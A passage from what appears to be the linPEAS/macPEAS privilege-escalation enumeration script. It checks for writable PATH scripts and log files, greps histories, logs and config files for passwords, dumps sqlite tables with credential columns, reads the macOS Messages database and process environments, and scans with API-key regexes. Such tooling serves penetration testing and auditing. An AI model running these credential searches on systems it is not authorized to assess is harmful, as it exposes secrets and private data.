  12323 if check_mitre_filter "T1552.001,T1114.001,T1005,T1564.001,T1574.007,T1083,T1552.007,T1082,T1204.002,T1070.002"; then
  12324 print_title "Other Interesting Files"
  12325 if check_mitre_filter "T1574.007"; then
  12326 if ! [ "$SEARCH_IN_FOLDER" ]; then
  12327   print_2title ".sh files in path" "T1574.007"
  12328   print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scriptbinaries-in-path"
  12329   echo $PATH | tr ":" "\n" | while read d; do
  12330     for f in $(find "$d" -name "*.sh" -o -name "*.sh.*" 2>/dev/null); do
  12331       if ! [ "$IAMROOT" ] && [ -O "$f" ]; then
  12332         echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED},"
  12333       elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits)
  12334         echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW},"
  12335       else
  12336         echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},";
  12337       fi
  12338     done
  12339   done
  12340   echo ""
  12341   broken_links=$(find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken)
  12342   if [ "$broken_links" ] || [ "$DEBUG" ]; then 
  12343     print_2title "Broken links in path" "T1574.007"
  12344     echo $PATH | tr ":" "\n" | while read d; do
  12345       find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E} "s,broken,${SED_RED},";
  12346     done
  12347     echo ""
  12348   fi
  12349 fi
  12350 
  12351 fi
  12352 
  12353 if check_mitre_filter "T1082"; then
  12354 if [ "$SEARCH_IN_FOLDER" ]; then
  12355   print_2title "Files datetimes inside the firmware (limit 50)" "T1082"
  12356   find "$SEARCH_IN_FOLDER" -type f -printf "%T+\n" 2>/dev/null | sort | uniq -c | sort | head -n 50
  12357   echo "To find a file with an specific date execute: find \"$SEARCH_IN_FOLDER\" -type f -printf \"%T+ %p\n\" 2>/dev/null | grep \"<date>\""
  12358   echo ""
  12359 fi
  12360 
  12361 fi
  12362 
  12363 if check_mitre_filter "T1083"; then
  12364 print_2title "Executable files potentially added by user (limit 70)" "T1083"
  12365 if ! [ "$SEARCH_IN_FOLDER" ]; then
  12366   find / -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "000|/site-packages|/python|/node_modules|\.sample|/gems|/cgroup/" | sort -r | head -n 70
  12367 else
  12368   find "$SEARCH_IN_FOLDER" -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "/site-packages|/python|/node_modules|\.sample|/gems|/cgroup/" | sort -r | head -n 70
  12369 fi
  12370 echo ""
  12371 
  12372 fi
  12373 
  12374 if check_mitre_filter "T1204.002"; then
  12375 if [ "$MACPEAS" ]; then
  12376   print_2title "Unsigned Applications" "T1204.002"
  12377   macosNotSigned /System/Applications
  12378 fi
  12379 
  12380 fi
  12381 
  12382 if check_mitre_filter "T1083"; then
  12383 if ! [ "$SEARCH_IN_FOLDER" ]; then
  12384   if [ "$(ls /opt 2>/dev/null)" ]; then
  12385     print_2title "Unexpected in /opt (usually empty)" "T1083"
  12386     ls -la /opt
  12387     echo ""
  12388   fi
  12389 fi
  12390 
  12391 fi
  12392 
  12393 if check_mitre_filter "T1083"; then
  12394 if ! [ "$SEARCH_IN_FOLDER" ]; then
  12395   print_2title "Unexpected in root" "T1083"
  12396   if [ "$MACPEAS" ]; then
  12397     (find $ROOT_FOLDER -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found
  12398   else
  12399     (find $ROOT_FOLDER -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found
  12400   fi
  12401   echo ""
  12402 fi
  12403 
  12404 fi
  12405 
  12406 if check_mitre_filter "T1083"; then
  12407 print_2title "Modified interesting files in the last 5mins (limit 100)" "T1083"
  12408 find $ROOT_FOLDER -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED},"
  12409 echo ""
  12410 
  12411 fi
  12412 
  12413 if check_mitre_filter "T1070.002"; then
  12414 if command -v logrotate >/dev/null && logrotate --version | head -n 1 | grep -Eq "[012]\.[0-9]+\.|3\.[0-9]\.|3\.1[0-7]\.|3\.18\.0"; then #3.18.0 and below
  12415 print_2title "Writable log files (logrotten) (limit 50)" "T1070.002"
  12416   print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#logrotate-exploitation"
  12417   logrotate --version 2>/dev/null || echo_not_found "logrotate"
  12418   lastWlogFolder="ImPOsSiBleeElastWlogFolder"
  12419   logfind=$(find $ROOT_FOLDER -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 50)
  12420   printf "%s\n" "$logfind" | while read log; do
  12421     if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found
  12422       if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC;
  12423       elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case
  12424       elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log";
  12425       elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g";
  12426       fi
  12427     fi
  12428   done
  12429 fi
  12430 # Check syslog configuration
  12431 print_2title "Syslog configuration (limit 50)" "T1070.002"
  12432 if [ -f "/etc/rsyslog.conf" ]; then
  12433     grep -v "^#" /etc/rsyslog.conf 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" | head -n 50
  12434 elif [ -f "/etc/syslog.conf" ]; then
  12435     grep -v "^#" /etc/syslog.conf 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" | head -n 50
  12436 else
  12437     echo_not_found "syslog configuration"
  12438 fi
  12439 # Check auditd configuration
  12440 print_2title "Auditd configuration (limit 50)" "T1070.002"
  12441 if [ -f "/etc/audit/auditd.conf" ]; then
  12442     grep -v "^#" /etc/audit/auditd.conf 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" | head -n 50
  12443 else
  12444     echo_not_found "auditd configuration"
  12445 fi
  12446 # Check for log files with weak permissions
  12447 print_2title "Log files with potentially weak perms (limit 50)" "T1070.002"
  12448 find /var/log -type f -ls 2>/dev/null | grep -Ev "root\s+root|root\s+systemd-journal|root\s+syslog|root\s+utmp" | sed -${E} "s,.*,${SED_RED},g" | head -n 50
  12449 echo ""
  12450 
  12451 fi
  12452 
  12453 if check_mitre_filter "T1083"; then
  12454 if ! [ "$SEARCH_IN_FOLDER" ]; then
  12455   print_2title "Files inside $HOME (limit 20)" "T1083"
  12456   (ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found
  12457   echo ""
  12458 fi
  12459 
  12460 fi
  12461 
  12462 if check_mitre_filter "T1552.001"; then
  12463 if ! [ "$SEARCH_IN_FOLDER" ]; then
  12464   print_2title "Files inside others home (limit 20)" "T1552.001"
  12465   (find $HOMESEARCH -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found
  12466   echo ""
  12467 fi
  12468 
  12469 fi
  12470 
  12471 if check_mitre_filter "T1114.001"; then
  12472 if ! [ "$SEARCH_IN_FOLDER" ]; then
  12473   print_2title "Searching installed mail applications" "T1114.001"
  12474   ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" | sort | uniq
  12475   echo ""
  12476 fi
  12477 
  12478 fi
  12479 
  12480 if check_mitre_filter "T1114.001"; then
  12481 if ! [ "$SEARCH_IN_FOLDER" ]; then
  12482   print_2title "Mails (limit 50)" "T1114.001"
  12483   (find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g") || echo_not_found
  12484   echo ""
  12485 fi
  12486 
  12487 fi
  12488 
  12489 if check_mitre_filter "T1552.001"; then
  12490 if ! [ "$SEARCH_IN_FOLDER" ]; then
  12491   if [ "$PSTORAGE_BACKUPS" ] || [ "$DEBUG" ]; then
  12492     print_2title "Backup folders" "T1552.001"
  12493     printf "%s\n" "$PSTORAGE_BACKUPS" | while read b ; do
  12494       ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g";
  12495       ls -l "$b" 2>/dev/null && echo ""
  12496     done
  12497     echo ""
  12498   fi
  12499 fi
  12500 
  12501 fi
  12502 
  12503 if check_mitre_filter "T1552.001"; then
  12504 print_2title "Backup files (limited 100)" "T1552.001"
  12505 backs=$(find $ROOT_FOLDER -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null)
  12506 printf "%s\n" "$backs" | head -n 100 | while read b ; do
  12507   if [ -r "$b" ]; then
  12508     ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g";
  12509   fi;
  12510 done
  12511 echo ""
  12512 
  12513 fi
  12514 
  12515 if check_mitre_filter "T1005"; then
  12516 if [ "$MACPEAS" ]; then
  12517   print_2title "Reading messages database" "T1005"
  12518   sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null
  12519   sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null
  12520   sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null
  12521 fi
  12522 if [ "$PSTORAGE_DATABASE" ] || [ "$DEBUG" ]; then
  12523   print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" "T1005"
  12524   FILECMD="$(command -v file 2>/dev/null || echo -n '')"
  12525   printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do
  12526     if [ "$FILECMD" ]; then
  12527       echo "Found "$(file "$f") | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g";
  12528     else
  12529       echo "Found $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g";
  12530     fi
  12531   done
  12532   SQLITEPYTHON=""
  12533   echo ""
  12534   printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do
  12535     if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd
  12536       if [ "$(command -v sqlite3 2>/dev/null || echo -n '')" ]; then
  12537         tables=$(sqlite3 $f ".tables" 2>/dev/null)
  12538         #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g"
  12539       elif [ "$(command -v python 2>/dev/null || echo -n '')" ] || [ "$(command -v python3 2>/dev/null || echo -n '')" ]; then
  12540         SQLITEPYTHON=$(command -v python 2>/dev/null || command -v python3 2>/dev/null || echo -n '')
  12541         tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null)
  12542         #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g"
  12543       else
  12544         tables=""
  12545       fi
  12546       if [ "$tables" ] || [ "$DEBUG" ]; then
  12547           printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC
  12548           printf "%s\n" "$tables" | while read t; do
  12549           columns=""
  12550           # Search for credentials inside the table using sqlite3
  12551           if [ -z "$SQLITEPYTHON" ]; then
  12552             columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE")
  12553           # Search for credentials inside the table using python
  12554           else
  12555             columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null)
  12556           fi
  12557           #Check found columns for interesting fields
  12558           INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt")
  12559           if [ "$INTCOLUMN" ]; then
  12560             printf ${BLUE}"  --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g"
  12561             printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g"
  12562             (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head
  12563             echo ""
  12564           fi
  12565         done
  12566       fi
  12567     fi
  12568   done
  12569 fi
  12570 echo ""
  12571 if [ "$MACPEAS" ]; then
  12572   print_2title "Downloaded Files" "T1005"
  12573   sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|"
  12574 fi
  12575 
  12576 fi
  12577 
  12578 if check_mitre_filter "T1005"; then
  12579 if [ "$MACPEAS" ]; then
  12580   print_2title "Downloaded Files" "T1005"
  12581   sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|"
  12582 fi
  12583 
  12584 fi
  12585 
  12586 if check_mitre_filter "T1005"; then
  12587 if ! [ "$SEARCH_IN_FOLDER" ]; then
  12588   print_2title "Web files?(output limit)" "T1005"
  12589   ls -alhR /var/www/ 2>/dev/null | head
  12590   ls -alhR /srv/www/htdocs/ 2>/dev/null | head
  12591   ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head
  12592   ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head
  12593   echo ""
  12594 fi
  12595 
  12596 fi
  12597 
  12598 if check_mitre_filter "T1564.001"; then
  12599 print_2title "All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)" "T1564.001"
  12600 find $ROOT_FOLDER -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme|\.travis.yml" | head -n 70
  12601 echo ""
  12602 
  12603 fi
  12604 
  12605 if check_mitre_filter "T1552.001"; then
  12606 if ! [ "$SEARCH_IN_FOLDER" ]; then
  12607   print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" "T1552.001"
  12608   filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | grep -Ev "dpkg\.statoverride\.|dpkg\.status\.|apt\.extended_states\.|dpkg\.diversions\." | head -n 70)
  12609   printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done
  12610   echo ""
  12611 fi
  12612 
  12613 fi
  12614 
  12615 if check_mitre_filter "T1552.001"; then
  12616 if [ "$(history 2>/dev/null)" ] || [ "$DEBUG" ]; then
  12617   print_2title "Searching passwords in history cmd" "T1552.001"
  12618   history | grep -Ei "$pwd_inside_history" "$f" 2>/dev/null | sed -${E} "s,$pwd_inside_history,${SED_RED},"
  12619   echo ""
  12620 fi
  12621 
  12622 fi
  12623 
  12624 if check_mitre_filter "T1552.001"; then
  12625 if [ "$PSTORAGE_HISTORY" ] || [ "$DEBUG" ]; then
  12626   print_2title "Searching passwords in history files" "T1552.001"
  12627   printf "%s\n" "$PSTORAGE_HISTORY" | while read f; do grep -EiH "$pwd_inside_history" "$f" 2>/dev/null | sed -${E} "s,$pwd_inside_history,${SED_RED},"; done
  12628   echo ""
  12629 fi
  12630 
  12631 fi
  12632 
  12633 if check_mitre_filter "T1552.001"; then
  12634 if [ "$PSTORAGE_PHP_FILES" ] || [ "$DEBUG" ]; then
  12635   print_2title "Searching passwords in config PHP files" "T1552.001"
  12636   printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiIH "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done
  12637   echo ""
  12638 fi
  12639 
  12640 fi
  12641 
  12642 if check_mitre_filter "T1552.001"; then
  12643 if [ "$PSTORAGE_PASSWORD_FILES" ] || [ "$DEBUG" ]; then
  12644   print_2title "Searching *password* or *credential* files in home (limit 70)" "T1552.001"
  12645   (printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print "  #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found
  12646   echo ""
  12647 fi
  12648 
  12649 fi
  12650 
  12651 if check_mitre_filter "T1552.001"; then
  12652 if ! [ "$SEARCH_IN_FOLDER" ]; then
  12653   print_2title "Checking for TTY (sudo/su) passwords in audit logs" "T1552.001"
  12654   aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g"
  12655   find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g"
  12656   echo ""
  12657 fi
  12658 
  12659 fi
  12660 
  12661 if check_mitre_filter "T1083"; then
  12662 if ! [ "$SEARCH_IN_FOLDER" ]; then
  12663   print_2title "Checking for TTY (sudo/su) passwords in audit logs" "T1083"
  12664   aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g"
  12665   find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g"
  12666   echo ""
  12667 fi
  12668 
  12669 fi
  12670 
  12671 if check_mitre_filter "T1114.001"; then
  12672 if [ "$DEBUG" ] || ( ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$SEARCH_IN_FOLDER" ] ); then
  12673   print_2title "Searching emails inside logs (limit 70)" "T1114.001"
  12674   (find /var/log/ /var/logs/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g"
  12675   echo ""
  12676 fi
  12677 
  12678 fi
  12679 
  12680 if check_mitre_filter "T1552.001"; then
  12681 if ! [ "$SEARCH_IN_FOLDER" ]; then
  12682   print_2title "Searching passwords inside logs (limit 70)" "T1552.001"
  12683   (find /var/log/ /var/logs/ /private/var/log -type f -exec grep -R -H -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|modules-config/config-set-passwords\|config-set-passwords already ran\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED},"
  12684   echo ""
  12685 fi
  12686 
  12687 fi
  12688 
  12689 if check_mitre_filter "T1552.001"; then
  12690 if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then
  12691   ##-- IF) Find possible files with passwords
  12692   print_2title "Searching possible password variables inside key folders (limit 140)" "T1552.001"
  12693   if ! [ "$SEARCH_IN_FOLDER" ]; then
  12694     timeout 150 find $HOMESEARCH -exec grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" &
  12695     timeout 150 find /var/www $backup_folders_row /tmp /etc /mnt /private -exec grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" &
  12696   else
  12697     timeout 150 find $SEARCH_IN_FOLDER -exec grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" &
  12698   fi
  12699   wait
  12700   echo ""
  12701   ##-- IF) Find possible conf files with passwords
  12702   print_2title "Searching possible password in config files (if k8s secrets are found you need to read the file)" "T1552.001"
  12703   if ! [ "$SEARCH_IN_FOLDER" ]; then
  12704     ppicf=$(timeout 150 find $HOMESEARCH /var/www/ /usr/local/www/ /etc /opt /tmp /private /Applications /mnt -name "*.conf" -o -name "*.cnf" -o -name "*.config" -o -name "*.json" -o -name "*.yml" -o -name "*.yaml" 2>/dev/null)
  12705   else
  12706     ppicf=$(timeout 150 find $SEARCH_IN_FOLDER -name "*.conf" -o -name "*.cnf" -o -name "*.config" -o -name "*.json" -o -name "*.yml" -o -name "*.yaml" 2>/dev/null)
  12707   fi
  12708   printf "%s\n" "$ppicf" | while read f; do
  12709     if grep -qEiI 'passwd.*|creden.*|^kind:\W?Secret|\Wenv:|\Wsecret:|\WsecretName:|^kind:\W?EncryptionConfiguration|\-\-encryption\-provider\-config' "$f" 2>/dev/null; then
  12710       echo "$ITALIC $f$NC"
  12711       grep -HnEiIo 'passwd.*|creden.*|^kind:\W?Secret|\Wenv:|\Wsecret:|\WsecretName:|^kind:\W?EncryptionConfiguration|\-\-encryption\-provider\-config' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g"
  12712     fi
  12713   done
  12714   echo ""
  12715 fi
  12716 
  12717 fi
  12718 
  12719 if check_mitre_filter "T1552.007,T1082"; then
  12720 if [ -z "$MACPEAS" ]; then
  12721   print_2title "Checking all env variables in /proc/*/environ removing duplicates and filtering out useless env vars" "T1552.007,T1082"
  12722   cat /proc/[0-9]*/environ 2>/dev/null | \
  12723   tr '\0' '\n' | \
  12724   grep -Eiv "$NoEnvVars" | \
  12725   sort -u | \
  12726   sed -${E} "s,$EnvVarsRed,${SED_RED},g"
  12727 fi
  12728 
  12729 fi
  12730 
  12731 fi
  12732 
  12733 fi
  12734 echo ''
  12735 echo ''
  12736 if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
  12737 
  12738 if echo $CHECKS | grep -q api_keys_regex; then
  12739 if check_mitre_filter "T1552.001,T1528"; then
  12740 print_title "API Keys Regex"
  12741 if check_mitre_filter "T1552.001,T1528"; then
  12742 if [ "$REGEXES" ] && [ "$TIMEOUT" ]; then
  12743         print_2title "Searching Hashed Passwords"
  12744     search_for_regex "Apr1 MD5" "\\$apr1\\$[a-zA-Z0-9_/\\.]{8}\\$[a-zA-Z0-9_/\\.]{22}" 
  12745     search_for_regex "Apache SHA" "\\{SHA\\}[0-9a-zA-Z/_=]{10,}" 
  12746     search_for_regex "Blowfish" "\\$2[abxyz]?\\$[0-9]{2}\\$[a-zA-Z0-9_/\\.]*" 
  12747     search_for_regex "Drupal" "\\$S\\$[a-zA-Z0-9_/\\.]{52}" 
  12748     search_for_regex "Joomlavbulletin" "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" 
  12749     search_for_regex "Linux MD5" "\\$1\\$[a-zA-Z0-9_/\\.]{8}\\$[a-zA-Z0-9_/\\.]{22}" 
  12750     search_for_regex "phpbb3" "\\$H\\$[a-zA-Z0-9_/\\.]{31}" 
  12751     search_for_regex "sha512crypt" "\\$6\\$[a-zA-Z0-9_/\\.]{16}\\$[a-zA-Z0-9_/\\.]{86}" 
  12752     search_for_regex "Wordpress" "\\$P\\$[a-zA-Z0-9_/\\.]{31}" 
  12753     echo ''
  12754 
  12755     print_2title "Searching Raw Hashes"
  12756     search_for_regex "sha512" "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" 
  12757     echo ''
  12758 
  12759     print_2title "Searching APIs"
  12760     search_for_regex "Adobe Client Id (Oauth Web)" "(adobe[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-f0-9]{32})['\"]" 1
  12761     search_for_regex "Abode Client Secret" "(p8e-)[a-z0-9]{32}" 1
  12762     search_for_regex "Age Secret Key" "AGE-SECRET-KEY-1[QPZRY9X8GF2TVDW0S3JN54KHCE6MUA7L]{58}" 
  12763     search_for_regex "Airtable API Key" "[\"']?air[-_]?table[-_]?api[-_]?key[\"']?[=:][\"']?.+[\"']\"" 
  12764     search_for_regex "Alchemi API Key" "(alchemi[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9-]{32})['\"]" 1
  12765     search_for_regex "Alibaba Access Key ID" "(LTAI)[a-z0-9]{20}" 1
  12766     search_for_regex "Alibaba Secret Key" "(alibaba[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{30})['\"]" 1
